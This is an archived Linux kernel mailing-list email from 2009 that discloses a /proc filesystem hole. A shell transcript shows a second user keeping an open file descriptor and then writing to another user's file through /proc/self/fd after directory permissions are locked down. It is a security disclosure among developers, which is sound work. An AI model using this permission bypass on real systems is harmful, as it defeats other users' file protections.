linux-fsdevel.vger.kernel.org archive mirror
 help / color / mirror / Atom feed
From: Pavel Machek <pavel@ucw.cz>
To: Jamie Lokier <jamie@shareable.org>
Cc: Miklos Szeredi <miklos@szeredi.hu>,
	Andreas Dilger <adilger@sun.com>,
	Valdis.Kletnieks@vt.edu, linux@treblig.org, agruen@suse.de,
	linux-fsdevel@vger.kernel.org, linux-kernel@vger.kernel.org
Subject: /proc filesystem allows bypassing directory permissions on Linux (was Re: [PATCH] vfs: new O_NODE open flag)
Date: Fri, 23 Oct 2009 19:10:25 +0200	[thread overview]
Message-ID: <20091023171025.GB24738@elf.ucw.cz> (raw)
In-Reply-To: <20091004225849.GA27481@shareable.org>

Hi!

> > >  a) the current permission model under /proc/PID/fd has a security
> > >     hole (which Jamie is worried about)
> > 
> > I believe its bugtraq time. Being able to reopen file with additional
> > permissions looks like  a security problem...
> > 
> > Jamie, do you have some test script? And do you want your 15 minutes
> >  of bugtraq fame? ;-).

> The reopen does check the inode permission, but it does not require
> you have any reachable path to the file.  Someone _might_ use that as
> a traditional unix security mechanism, but if so it's probably quite rare.

Ok, I got this, with two users. I guess it is real (but obscure)
security hole.

So, we have this scenario. pavel is not doing anything interesting in
the background.

pavel@toy:/tmp$ uname -a
Linux toy.ucw.cz 2.6.32-rc3 #21 Mon Oct 19 07:32:02 CEST 2009 armv5tel GNU/Linux
pavel@toy:/tmp mkdir my_priv; cd my_priv
pavel@toy:/tmp/my_priv$ echo this file should never be writable > unwritable_file
# lock down directory
pavel@toy:/tmp/my_priv$ chmod 700 .
# relax file permissions, directory is private, so this is safe
# check link count on unwritable_file. We would not want someone 
# to have a hard link to work around our permissions, would we?
pavel@toy:/tmp/my_priv$ chmod 666 unwritable_file 
pavel@toy:/tmp/my_priv$ cat unwritable_file 
this file should never be writable
pavel@toy:/tmp/my_priv$ cat unwritable_file 
got you
# Security problem here

[Please pause here for a while before reading how guest did it.]

Unexpected? Well, yes, to me anyway. Linux specific? Yes, I think so.

So what did happen? User guest was able to work around directory
permissions in the background, using /proc filesystem.

guest@toy:~$ bash 3< /tmp/my_priv/unwritable_file 
# Running inside nested shell
guest@toy:~$ read A <&3
guest@toy:~$ echo $A
this file should never be writable

guest@toy:~$ cd /tmp/my_priv
guest@toy:/tmp/my_priv$ ls
unwritable_file

# pavel did chmod 000, chmod 666 here
guest@toy:/tmp/my_priv$ ls
ls: cannot open directory .: Permission denied

# Linux correctly prevents guest from writing to that file
guest@toy:/tmp/my_priv$ cat unwritable_file
cat: unwritable_file: Permission denied
guest@toy:/tmp/my_priv$ echo got you >&3
bash: echo: write error: Bad file descriptor

# ...until we take a way around it with /proc filesystem. Oops.
guest@toy:/tmp/my_priv$ echo got you > /proc/self/fd/3 

								Pavel
-- 
(english) http://www.livejournal.com/~pavelmachek
(cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html

  reply	other threads:[~2009-10-23 17:10 UTC|newest]

Thread overview: 23+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2009-09-24 14:51 [PATCH] vfs: new O_NODE open flag Miklos Szeredi
2009-09-25  0:23 ` Andreas Gruenbacher
2009-09-25  5:52   ` Miklos Szeredi
2009-09-25 12:37     ` Dr. David Alan Gilbert
2009-09-25 12:18       ` Miklos Szeredi
2009-09-25 17:08         ` Jamie Lokier
2009-09-25 16:53       ` Andreas Dilger
2009-09-25 17:20       ` Valdis.Kletnieks
2009-09-25 18:35         ` Dr. David Alan Gilbert
2009-09-25 21:18           ` Valdis.Kletnieks
2009-09-28 10:25             ` Miklos Szeredi
2009-09-28 13:28               ` Jamie Lokier
2009-09-28 14:07                 ` Miklos Szeredi
2009-09-28 14:10                   ` Jamie Lokier
2009-09-30  8:18                 ` Florian Weimer
2009-09-28 15:21               ` Andreas Dilger
2009-09-28 16:04                 ` Miklos Szeredi
2009-10-04 19:03                   ` Pavel Machek
2009-10-04 22:58                     ` Jamie Lokier
2009-10-23 17:10                       ` Pavel Machek [this message]
2009-10-14 13:14                   ` Andreas Gruenbacher
2009-09-25 19:02         ` Andreas Dilger
2009-09-28 15:53           ` Jamie Lokier

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=20091023171025.GB24738@elf.ucw.cz \
    --to=pavel@ucw.cz \
    --cc=Valdis.Kletnieks@vt.edu \
    --cc=adilger@sun.com \
    --cc=agruen@suse.de \
    --cc=jamie@shareable.org \
    --cc=linux-fsdevel@vger.kernel.org \
    --cc=linux-kernel@vger.kernel.org \
    --cc=linux@treblig.org \
    --cc=miklos@szeredi.hu \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body. 
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).